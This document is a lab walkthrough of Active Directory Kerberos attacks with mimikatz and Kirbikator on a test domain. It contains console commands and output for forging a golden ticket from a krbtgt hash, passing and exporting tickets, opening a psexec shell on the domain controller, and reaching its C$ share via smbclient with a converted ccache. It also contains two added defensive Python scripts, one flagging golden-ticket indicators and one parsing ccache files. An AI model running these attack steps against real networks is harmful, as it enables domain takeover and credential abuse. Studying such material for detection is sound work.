Kerberos Modules
1. .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 9201500:33:13)
2. .## ^ ##.
3. ## / ## /* * *
4. ## / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
5. '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
6. '#####' with16 modules * * */
7.
8.
9. mimikatz # kerberos::
10.ERROR mimikatz_doLocal ; "(null)" command of "kerberos"modulenot found !
11.
12.Module : kerberos
13.Full name : Kerberospackagemodule
14.Description :
15.
16. ptt - Pass-the-ticket [NT 6]
17. list - List ticket(s)
18. tgt - Retrieve current TGT
19. purge - Purge ticket(s)
20. golden - WillyWonka factory
21. hash - Hash password to keys
22. ptc - Pass-the-ccache [NT6]
23. clist - List tickets in MIT/Heimdall ccache
24.
25.mimikatz #
Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:sittingduck.info /sid:S-1-5-21-2792304509-1851296738-3446580569 /krbtgt:994ceb7e251e5afc550eef79d8172d64 /ticket:gold.kirbi
User      : Administrator
Domain    : sittingduck.info
SID       : S-1-5-21-2792304509-1851296738-3446580569
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 994ceb7e251e5afc550eef79d8172d64 - rc4_hmac_nt
Lifetime  : 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
-> Ticket : gold.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
Pass the Ticket
mimikatz # kerberos::ptt gold.kirbi
0 - File 'gold.kirbi' : OK

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
   Server Name       : krbtgt/sittingduck.info @ sittingduck.info
   Client Name       : Administrator @ sittingduck.info
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

mimikatz #
Injecting tickets with Kirbikator
C:\Users\otanadmin\Desktop>kirbikator.exe lsa gold.kirbi

  .#####.   KiRBikator 1.0 (x86) release "Kiwi en C" (Feb  1 2015 03:37:29)
 .## ^ ##.
 ## / \ ##  /* * *
## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                    * * */

Destination : Microsoft LSA API (multiple)
  < gold.kirbi (RFC KRB-CRED (#22))
    > Ticket Administrator@sittingduck.info-krbtgt~sittingduck.info@sittingduck.info : injected
Exporting active tickets
mimikatz # kerberos::list /export

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 60a10000    : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
   * Saved to file   : 0-60a10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file   : 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi

[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file   : 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : ldap/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file   : 3-40a50000-uberuser@ldap~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi

[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : LDAP/dc1.sittingduck.info/sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file   : 4-40a50000-uberuser@LDAP~dc1.sittingduck.info~sittingduck.info-SITTINGDUCK.INFO.kirbi
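The two listings above give a defender a concrete basis for comparison: the forged ticket from the golden-ticket section has a ten-year lifetime, is encrypted with rc4_hmac_nt and carries a lower-case realm, while every KDC-issued ticket exported here lives ten hours, uses aes256_hmac and names SITTINGDUCK.INFO in upper case. The script below is an added example, not mimikatz code: it parses kerberos::list output, decodes the Flags word per RFC 4120 and reports entries that match those indicators. The sample listing is reconstructed from this page; the ten-hour threshold and the three heuristics are this example's assumptions, chosen to match what the page shows.

```python
"""Triage a mimikatz kerberos::list dump for golden-ticket indicators.

Added example, not mimikatz code. The sample listing is reconstructed from this page;
the lifetime threshold and the heuristics are assumptions of this example.
"""
import re
from datetime import datetime, timedelta

# KerberosFlags bit values, RFC 4120 section 5.4.1 (bit 0 is the most significant bit).
TICKET_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable",
    0x08000000: "proxy", 0x04000000: "may_postdate", 0x02000000: "postdated",
    0x01000000: "invalid", 0x00800000: "renewable", 0x00400000: "initial",
    0x00200000: "pre_authent", 0x00100000: "hw_authent",
    0x00080000: "transited_policy_checked", 0x00040000: "ok_as_delegate",
    0x00020000: "anonymous", 0x00010000: "name_canonicalize",
}

# One ticket entry as mimikatz prints it; tolerant of the "ServerName" / "Flags40e00000"
# spacing that copied output often has.
ENTRY_RE = re.compile(
    r"\[(?P<idx>[0-9a-f]{8})\] - 0x(?P<etype>[0-9a-f]+) - (?P<ename>\S+)\s*\n"
    r"\s*Start/End/MaxRenew:\s*(?P<start>[^;]+?)\s*;\s*(?P<end>[^;]+?)\s*;\s*(?P<renew>[^\n]+?)\s*\n"
    r"\s*Server\s?Name\s*:\s*(?P<spn>\S+)\s*@\s*(?P<srealm>\S+)\s*\n"
    r"\s*Client\s?Name\s*:\s*(?P<client>\S+)\s*@\s*(?P<crealm>\S+)\s*\n"
    r"\s*Flags\s?(?P<flags>[0-9a-f]{8})\s*:",
    re.IGNORECASE,
)


def parse_time(text):
    return datetime.strptime(text.strip(), "%m/%d/%Y %I:%M:%S %p")


def decode_flags(value):
    """Names of the set bits, lowest bit first (the order mimikatz prints them)."""
    return [name for bit, name in sorted(TICKET_FLAGS.items()) if value & bit]


def analyze(listing, kdc_realm, max_tgt_lifetime=timedelta(hours=10)):
    """Return one record per ticket with the heuristics that fired for it."""
    records = []
    for m in ENTRY_RE.finditer(listing):
        start, end = parse_time(m["start"]), parse_time(m["end"])
        is_tgt = m["spn"].lower().startswith("krbtgt/")
        reasons = []
        # Heuristic 1: AD issues 10-hour TGTs; a forged one defaults to a 10-year lifetime.
        if is_tgt and end - start > max_tgt_lifetime:
            reasons.append(f"TGT lifetime {(end - start).days} days exceeds the {max_tgt_lifetime} policy")
        # Heuristic 2: an RC4 TGT in a domain whose KDC hands out AES tickets suggests it was
        # minted from the krbtgt NT hash rather than issued by the KDC.
        if is_tgt and m["ename"].lower().startswith("rc4"):
            reasons.append(f"TGT encrypted with {m['ename']} while the KDC issues AES tickets")
        # Heuristic 3: the KDC writes the realm in upper case; a forged ticket carries the
        # realm exactly as it was typed.
        if m["srealm"] != kdc_realm or m["crealm"] != kdc_realm:
            reasons.append(f"realm spelled {m['srealm']!r}, KDC issues {kdc_realm!r}")
        records.append({
            "index": int(m["idx"], 16),
            "client": f"{m['client']}@{m['crealm']}",
            "service": f"{m['spn']}@{m['srealm']}",
            "etype": m["ename"],
            "flags": decode_flags(int(m["flags"], 16)),
            "lifetime_hours": (end - start).total_seconds() / 3600,
            "reasons": reasons,
        })
    return records


# Constructed sample: the forged ticket from "Pass the Ticket" followed by one KDC-issued
# TGT from "Exporting active tickets", spaced as mimikatz prints them.
SAMPLE_LISTING = """
[00000000] - 0x00000017 - rc4_hmac_nt
   Start/End/MaxRenew: 10/26/2015 11:28:54 PM ; 10/23/2025 11:28:54 PM ; 10/23/2025 11:28:54 PM
   Server Name       : krbtgt/sittingduck.info @ sittingduck.info
   Client Name       : Administrator @ sittingduck.info
   Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
"""

if __name__ == "__main__":
    for rec in analyze(SAMPLE_LISTING, "SITTINGDUCK.INFO"):
        verdict = "SUSPECT" if rec["reasons"] else "ok"
        print(f"[{rec['index']}] {rec['client']} -> {rec['service']} "
              f"({rec['etype']}, {rec['lifetime_hours']:.0f}h) {verdict}")
        for reason in rec["reasons"]:
            print("    -", reason)
```

Run against the sample, entry 0 trips all three heuristics and entry 1 none. The decoder reproduces the flag names mimikatz prints for every Flags word on this page (40e00000, 60a10000, 40e10000, 40a50000), which is a cheap way to confirm the bit table before trusting it on a real dump.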
PSEXEC with standard Kerberos tickets
mimikatz # kerberos::list

mimikatz # (EMPTY LIST)

mimikatz # kerberos::ptt 1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi
0 - File '1-40e10000-uberuser@krbtgt~SITTINGDUCK.INFO-SITTINGDUCK.INFO.kirbi' : OK

mimikatz # kerberos::ptt 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi
0 - File '2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi' : OK

mimikatz # kerberos::list

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:31 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : krbtgt/SITTINGDUCK.INFO @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 10/26/2015 11:39:32 PM ; 10/27/2015 9:39:31 AM ; 11/2/2015 11:39:31 PM
   Server Name       : cifs/dc1.sittingduck.info @ SITTINGDUCK.INFO
   Client Name       : uberuser @ SITTINGDUCK.INFO
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;

mimikatz #


C:\Users\otanadmin\Desktop>psexec \\dc1 cmd.exe

PsExec v1.97 - Execute processes remotely
Copyright (C) 2001-2009 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
sittingduck\uberuser

C:\Windows\system32>echo %COMPUTERNAME%
DC1

C:\Windows\system32>
Convert Mimikatz Kerberos ticket to CCache and use
C:\Users\otanadmin\Desktop>kirbikator.exe ccache "2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi"

  .#####.   KiRBikator 1.0 (x86) release "Kiwi en C" (Feb  1 2015 03:37:29)
 .## ^ ##.
 ## / \ ##  /* * *
## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                    * * */

Destination : MIT Credential Cache (simple)
  < 2-40a50000-uberuser@cifs~dc1.sittingduck.info-SITTINGDUCK.INFO.kirbi (RFC KRB-CRED (#22))
    > Single file : uberuser@SITTINGDUCK.INFO.ccache

C:\Users\otanadmin\Desktop>
Method 1
KRB5CCNAME=uberuser@SITTINGDUCK.INFO.ccache smbclient -k //dc1.sittingduck.info/c$
OS=[Windows Server 2012 R2 Standard 9600] Server=[Windows Server 2012 R2 Standard 6.3]
smb: \>
Method 2
root@kali:~# apt-get install krb5-user
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  krb5-config libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
Suggested packages:
  krb5-doc
The following NEW packages will be installed:
  krb5-config krb5-user libgssrpc4 libkadm5clnt-mit9 libkadm5srv-mit9 libkdb5-7
0 upgraded, 6 newly installed, 0 to remove and 0 not upgraded.
Need to get 466 kB of archives.
After this operation, 1,199 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
0% [Connecting to http.kali.org]
<SNIP>

root@kali:~/Desktop# klist
klist: Credentials cache file '/tmp/krb5cc_0' not found
root@kali:~/Desktop# cp uberuser@SITTINGDUCK.INFO.ccache /tmp/krb5cc_0
root@kali:~/Desktop# smbclient -k //dc1.sittingduck.info/c$
OS=[Windows Server 2012 R2 Standard 9600] Server=[Windows Server 2012 R2 Standard 6.3]
smb: \>
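The file that Kirbikator writes, and that Method 2 copies to /tmp/krb5cc_0, is an MIT credential cache. A responder who finds a stray cache on a host can list what it holds without installing krb5-user. The reader below is an added example, not Kirbikator or MIT code: it implements the version-4 layout (magic 0x0504, header tags, default principal, then credentials to end of file) and comes with a matching writer that builds a constructed two-ticket sample mirroring the krbtgt and cifs tickets on this page, with placeholder key and ticket bytes. The layout is my reading of the MIT ccache file format description; caches written by kinit may additionally contain configuration pseudo-credentials, which parse through the same path.

```python
"""Read an MIT credential cache (ccache, format version 4) without the krb5 tools.
Added example, not Kirbikator or MIT code; the field layout follows the MIT ccache file
format for version 0x0504, and the sample cache is constructed with placeholder bytes."""
import struct
from datetime import datetime, timezone


class Reader:
    """Cursor over the big-endian, length-prefixed fields of a ccache file."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError(f"truncated ccache at offset {self.pos}")
        self.pos += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def counted(self): return self.take(self.u32())   # uint32 length, then that many bytes

    def principal(self):
        _name_type, count = self.u32(), self.u32()
        realm = self.counted().decode()                # realm precedes the name components
        return "/".join(self.counted().decode() for _ in range(count)) + "@" + realm

    def skip_tagged_list(self):                        # addresses / authdata: count, then
        for _ in range(self.u32()):                    # (uint16 type, counted data) each
            self.u16()
            self.counted()


def parse_ccache(data):
    """Return (default principal, list of credential dicts) for a v4 ccache."""
    r = Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    r.take(r.u16())                                    # header tags (v4), e.g. KDC time offset
    default_principal = r.principal()
    creds = []
    while r.pos < len(r.data):                         # credentials run to end of file
        client, server = r.principal(), r.principal()
        etype, key = r.u16(), r.counted()              # v4 keyblock: enctype, counted key
        authtime, start, end, renew_till = (r.u32() for _ in range(4))
        r.u8()                                         # is_skey
        flags = r.u32()                                # same bit layout as ASN.1 TicketFlags
        r.skip_tagged_list()                           # addresses
        r.skip_tagged_list()                           # authorization data
        ticket, _second_ticket = r.counted(), r.counted()
        creds.append({"client": client, "server": server, "etype": etype, "key_len": len(key),
                      "auth": authtime, "start": start, "end": end, "renew_till": renew_till,
                      "flags": flags, "ticket_len": len(ticket)})
    return default_principal, creds


def pack_counted(b):
    return struct.pack(">I", len(b)) + b


def pack_principal(name_type, realm, parts):
    out = struct.pack(">II", name_type, len(parts)) + pack_counted(realm.encode())
    return out + b"".join(pack_counted(p.encode()) for p in parts)


def build_ccache(client, realm, creds):
    """Serialize a v4 ccache; creds are (service parts, etype, key, start, end, renew, flags, ticket)."""
    header = struct.pack(">HHii", 1, 8, 0, 0)          # one tag: DeltaTime (seconds, microseconds)
    out = b"\x05\x04" + struct.pack(">H", len(header)) + header
    out += pack_principal(1, realm, [client])          # NT-PRINCIPAL
    for parts, etype, key, start, end, renew, flags, ticket in creds:
        out += pack_principal(1, realm, [client]) + pack_principal(2, realm, parts)  # NT-SRV-INST
        out += struct.pack(">H", etype) + pack_counted(key)
        out += struct.pack(">IIIIBI", start, start, end, renew, 0, flags)  # times, is_skey, flags
        out += struct.pack(">II", 0, 0)                # no addresses, no authdata
        out += pack_counted(ticket) + pack_counted(b"")  # ticket, second_ticket
    return out


# Constructed sample: start 2015-10-26 23:39:31 UTC, 10-hour tickets renewable for 7 days,
# AES256-CTS (etype 18) keys and ticket blobs replaced by fixed placeholder bytes.
START = 1445902771
SAMPLE_CREDS = [
    (["krbtgt", "SITTINGDUCK.INFO"], 18, b"\x11" * 32, START, START + 36000,
     START + 7 * 86400, 0x40E10000, b"\x61" * 40),
    (["cifs", "dc1.sittingduck.info"], 18, b"\x22" * 32, START, START + 36000,
     START + 7 * 86400, 0x40A50000, b"\x61" * 40),
]


def sample_ccache():
    return build_ccache("uberuser", "SITTINGDUCK.INFO", SAMPLE_CREDS)


if __name__ == "__main__":
    stamp = lambda t: datetime.fromtimestamp(t, timezone.utc).strftime("%m/%d/%Y %H:%M:%S")
    default_principal, creds = parse_ccache(sample_ccache())
    print("Default principal:", default_principal)
    for c in creds:
        print(f"{stamp(c['start'])}  {stamp(c['end'])}  {c['server']}  etype {c['etype']}  flags {c['flags']:08x}")
```

Point parse_ccache at the bytes of a real /tmp/krb5cc_0 to get the same klist-style view; the Reader raises on a short read rather than silently returning partial entries, which matters when a cache was cut off mid-copy.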